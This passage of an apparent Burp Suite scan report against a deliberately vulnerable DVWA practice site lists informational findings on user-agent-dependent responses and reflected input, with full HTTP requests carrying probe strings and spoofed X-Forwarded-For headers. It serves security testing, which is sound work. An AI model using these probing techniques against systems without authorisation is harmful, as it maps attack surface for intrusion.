User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=d694d24b4b0d9e955286864450e25ede
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
X-Forwarded-For: 127.0.0.1
Response 2
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 10:00:53 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 83084
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; co
...[SNIP]...
27.2. https://pentest-ground.com:4280/vulnerabilities/fi/
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Firm |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/fi/ |
Request 1
GET /vulnerabilities/fi/?page=file3.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=203536d9ff1aefc1bc842561eeb56926
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/fi/?page=include.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:53:38 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4448
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: File Inclusion :: Damn Vulnerable Web Application (DVWA)<
...[SNIP]...
<em>15.188.62.172</em>
...[SNIP]...
Request 2
GET /vulnerabilities/fi/?page=file3.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=203536d9ff1aefc1bc842561eeb56926
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/fi/?page=include.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
X-Forwarded-For: 127.0.0.1
Response 2
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:53:39 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4459
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: File Inclusion :: Damn Vulnerable Web Application (DVWA)<
...[SNIP]...
<em>127.0.0.1, 15.188.62.172</em>
...[SNIP]...
28. User agent-dependent response
Previous
Next
There are 4 instances of this issue:
Issue description
Application responses may depend systematically on the value of the User-Agent header in requests. This behavior does not itself constitute a security vulnerability, but may point towards additional attack surface within the application, which may contain vulnerabilities.
This behavior often arises because applications provide different user interfaces for desktop and mobile users. Mobile interfaces have often been less thoroughly tested for vulnerabilities such as cross-site scripting, and often have simpler authentication and session handling mechanisms that may contain problems that are not present in the full interface.
To review the interface provided by the alternate User-Agent header, you can configure a match/replace rule in Burp Proxy to modify the User-Agent header in all requests, and then browse the application in the normal way using your normal browser.
Vulnerability classifications
28.1. http://pentest-ground.com:4280/
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Firm |
Host: |
http://pentest-ground.com:4280 |
Path: |
/ |
Request 1
GET / HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 400 Bad Request
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:55:05 GMT
Content-Type: text/html
Content-Length: 657
Connection: close
<html>
<head><title>400 The plain HTTP request was sent to HTTPS port</title></head>
<body>
<center><h1>400 Bad Request</h1></center>
<center>The plain HTTP request was sent to HTTPS port</center>
...[SNIP]...
</html>
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
Request 2
GET / HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 2
HTTP/1.1 400 Bad Request
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:55:05 GMT
Content-Type: text/html
Content-Length: 255
Connection: close
<html>
<head><title>400 The plain HTTP request was sent to HTTPS port</title></head>
<body>
<center><h1>400 Bad Request</h1></center>
<center>The plain HTTP request was sent to HTTPS port</center>
...[SNIP]...
28.2. http://pentest-ground.com:4280/robots.txt
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Firm |
Host: |
http://pentest-ground.com:4280 |
Path: |
/robots.txt |
Request 1
GET /robots.txt HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Response 1
HTTP/1.1 400 Bad Request
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:56:14 GMT
Content-Type: text/html
Content-Length: 657
Connection: close
<html>
<head><title>400 The plain HTTP request was sent to HTTPS port</title></head>
<body>
<center><h1>400 Bad Request</h1></center>
<center>The plain HTTP request was sent to HTTPS port</center>
...[SNIP]...
</html>
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
Request 2
GET /robots.txt HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3
Connection: close
Cache-Control: max-age=0
Response 2
HTTP/1.1 400 Bad Request
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:56:14 GMT
Content-Type: text/html
Content-Length: 255
Connection: close
<html>
<head><title>400 The plain HTTP request was sent to HTTPS port</title></head>
<body>
<center><h1>400 Bad Request</h1></center>
<center>The plain HTTP request was sent to HTTPS port</center>
...[SNIP]...
28.3. https://pentest-ground.com:4280/phpinfo.php
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Firm |
Host: |
https://pentest-ground.com:4280 |
Path: |
/phpinfo.php |
Request 1
GET /phpinfo.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=d694d24b4b0d9e955286864450e25ede
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 10:00:47 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 83052
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; co
...[SNIP]...
Request 2
GET /phpinfo.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=d694d24b4b0d9e955286864450e25ede
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 2
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 10:00:47 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 83109
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; co
...[SNIP]...
28.4. https://pentest-ground.com:4280/vulnerabilities/fi/
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Firm |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/fi/ |
Request 1
GET /vulnerabilities/fi/?page=file3.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=203536d9ff1aefc1bc842561eeb56926
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/fi/?page=include.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:53:31 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4448
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: File Inclusion :: Damn Vulnerable Web Application (DVWA)<
...[SNIP]...
<em>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36</em>
...[SNIP]...
Request 2
GET /vulnerabilities/fi/?page=file3.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=203536d9ff1aefc1bc842561eeb56926
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/fi/?page=include.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 2
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:53:32 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4467
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: File Inclusion :: Damn Vulnerable Web Application (DVWA)<
...[SNIP]...
<em>Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3</em>
...[SNIP]...
29. Input returned in response (reflected)
Previous
Next
There are 37 instances of this issue:
Issue background
Reflection of input arises when data is copied from a request and echoed into the application's immediate response.
Input being returned in application responses is not a vulnerability in its own right. However, it is a prerequisite for many client-side vulnerabilities, including cross-site scripting, open redirection, content spoofing, and response header injection. Additionally, some server-side vulnerabilities such as SQL injection are often easier to identify and exploit when input is returned in responses. In applications where input retrieval is rare and the environment is resistant to automated testing (for example, due to a web application firewall), it might be worth subjecting instances of it to focused manual testing.
Vulnerability classifications
29.1. https://pentest-ground.com:4280/phpinfo.php [PHPSESSID cookie]
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/phpinfo.php |
Issue detail
The value of the PHPSESSID cookie is copied into the application's response.
Request 1
GET /phpinfo.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=d694d24b4b0d9e955286864450e25edepz19tuuqwc
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:58:21 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 83102
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; co
...[SNIP]...
<td class="v">security=low; PHPSESSID=d694d24b4b0d9e955286864450e25edepz19tuuqwc </td>
...[SNIP]...
<td class="v">security=low; PHPSESSID=d694d24b4b0d9e955286864450e25edepz19tuuqwc </td>
...[SNIP]...
<td class="v">d694d24b4b0d9e955286864450e25edepz19tuuqwc</td>
...[SNIP]...
<td class="v">d694d24b4b0d9e955286864450e25edepz19tuuqwc</td>
...[SNIP]...
<td class="v">security=low; PHPSESSID=d694d24b4b0d9e955286864450e25edepz19tuuqwc</td>
...[SNIP]...
29.2. https://pentest-ground.com:4280/phpinfo.php [Referer HTTP header]
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/phpinfo.php |
Issue detail
The value of the Referer HTTP header is copied into the application's response.
Request 1
GET /phpinfo.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=d694d24b4b0d9e955286864450e25ede
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/fh8pywhykd
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 10:00:01 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 83082
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; co
...[SNIP]...
<td class="v">https://pentest-ground.com:4280/fh8pywhykd </td>
...[SNIP]...
<td class="v">https://pentest-ground.com:4280/fh8pywhykd </td>
...[SNIP]...
<td class="v">https://pentest-ground.com:4280/fh8pywhykd</td>
...[SNIP]...
29.3. https://pentest-ground.com:4280/phpinfo.php [User-Agent HTTP header]
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/phpinfo.php |
Issue detail
The value of the User-Agent HTTP header is copied into the application's response.
Request 1
GET /phpinfo.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36vrgzsd9ls9
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=d694d24b4b0d9e955286864450e25ede
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:59:34 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 83082
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; co
...[SNIP]...
<td class="v">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36vrgzsd9ls9 </td>
...[SNIP]...
<td class="v">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36vrgzsd9ls9 </td>
...[SNIP]...
<td class="v">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36vrgzsd9ls9</td>
...[SNIP]...
29.4. https://pentest-ground.com:4280/phpinfo.php [name of an arbitrarily supplied URL parameter]
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/phpinfo.php |
Issue detail
The name of an arbitrarily supplied URL parameter is copied into the application's response.
Request 1
GET /phpinfo.php?o8ac0dpbaz=1 HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=d694d24b4b0d9e955286864450e25ede
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:58:25 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 83252
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; co
...[SNIP]...
<td class="v">o8ac0dpbaz=1 </td>
...[SNIP]...
<td class="v">/phpinfo.php?o8ac0dpbaz=1 </td>
...[SNIP]...
<td class="v">GET /phpinfo.php?o8ac0dpbaz=1 HTTP/1.0 </td>
...[SNIP]...
<td class="e">$_REQUEST['o8ac0dpbaz']</td>
...[SNIP]...
<td class="e">$_GET['o8ac0dpbaz']</td>
...[SNIP]...
<td class="v">o8ac0dpbaz=1</td>
...[SNIP]...
<td class="v">/phpinfo.php?o8ac0dpbaz=1</td>
...[SNIP]...
<pre>Array
(
[0] => o8ac0dpbaz=1
)
</pre>
...[SNIP]...
29.5. https://pentest-ground.com:4280/phpinfo.php [security cookie]
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/phpinfo.php |
Issue detail
The value of the security cookie is copied into the application's response.
Request 1
GET /phpinfo.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=lowo201zxcn5x; PHPSESSID=d694d24b4b0d9e955286864450e25ede
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:57:10 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 83182
Connection: close
X-Powered-By: PHP/8.3.12
Set-Cookie: security=low; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; co
...[SNIP]...
<td class="v">security=lowo201zxcn5x; PHPSESSID=d694d24b4b0d9e955286864450e25ede </td>
...[SNIP]...
<td class="v">security=lowo201zxcn5x; PHPSESSID=d694d24b4b0d9e955286864450e25ede </td>
...[SNIP]...
<td class="v">lowo201zxcn5x</td>
...[SNIP]...
<td class="v">lowo201zxcn5x</td>
...[SNIP]...
<td class="v">security=lowo201zxcn5x; PHPSESSID=d694d24b4b0d9e955286864450e25ede</td>
...[SNIP]...
29.6. https://pentest-ground.com:4280/vulnerabilities/brute/ [security cookie]
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/brute/ |
Issue detail
The value of the security cookie is copied into the application's response.
Request 1
GET /vulnerabilities/brute/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=lowd0q0hhgj13; PHPSESSID=72abe663667a4505362110ff551e5951
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:56:11 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4266
Connection: close
X-Powered-By: PHP/8.3.12
Set-Cookie: security=low; path=/
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
